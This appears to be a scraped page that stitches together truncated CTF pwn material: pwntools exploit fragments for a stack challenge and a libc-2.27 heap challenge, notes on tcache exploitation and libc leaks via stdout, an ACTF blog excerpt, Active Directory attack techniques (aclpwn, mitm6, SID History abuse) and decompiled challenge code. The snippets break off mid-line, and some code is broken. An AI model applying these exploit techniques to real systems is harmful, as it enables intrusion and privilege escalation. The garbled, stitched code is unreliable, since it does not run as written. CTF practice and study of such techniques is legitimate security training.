from pwn import *
p = process('./stack2')
p.sendlineafter('you have:','1')
p.sendline('Giveme your numbers','1')
def change(a,b):
    p.sendlineafter('5. exit','3')
    p.recvuntil('which number to change:')
    p.sendline(str(a
Difficulty 5: practice roadmap. ailx10: xctf-very_easy_sql (Gopher protocol, SSRF vulnerability and time-based blind SQL injection)
from pwn import *
import sys
libc = ELF("./libc-2.27.so")
context.log_level = "debug"
def new(idx:int, size:int):
    p.sendlineafter(b"Your choice: ", b"1")
    p.sendlineafter(b"Index: ", str(idx).encode())
    p.sendlineafter(b"Size: ", str(size).encode())
def edit(idx:int...
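This year's final XCTF event, ACTF, has wrapped up, and the team held on to 19th place in the end, which should be enough for a ticket to the finals. But in ACTF the pwn challenges were a miserable zero. Although I am the only one who does them, that is no excuse to slack off; after all, I need to keep growing into a mainstay of the team, and with so many strong peers my age around me there is even less reason to be discouraged. During military training I reproduced Tree_pwn, and under the guidance of uuu (https://caffeine.darkflow.top/) I learned ...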
Pwn three: three chunks, tcache exploitation, leaking libc by modifying stdout
add(io,"0\n")
add(io,"1\n")
delete(io,0,"y")
delete(io,1,"n")
#libc_base, proc_base, heap_base = get_pie_addr()
#print "libc_base:", hex(libc_base&0xffffff)
#print "heap_base:", hex(heap_base&0xffff)
heap_base=0x...
aclpwn.py Invoke-ACLPwn Abusing IPv6 with mitm6 Compromising IPv4 networks via IPv6 mitm6 SID History Abuse WUT IS DIS?: If we manage to compromise a child domain of a forest and SID filtering isn't enabled (most of the time it is not), we can abuse it to privilege escalate to Domain ...
("* An easy calc *");
puts("*Give me your numbers and I will return to you an average *");
puts("*(0 <= x < 256) *");
puts("***");
puts("How many numbers you have:");
__isoc99_scanf("%d", &v5);
puts("Give me your numbers");
for ( i = 0; i < v5 && (...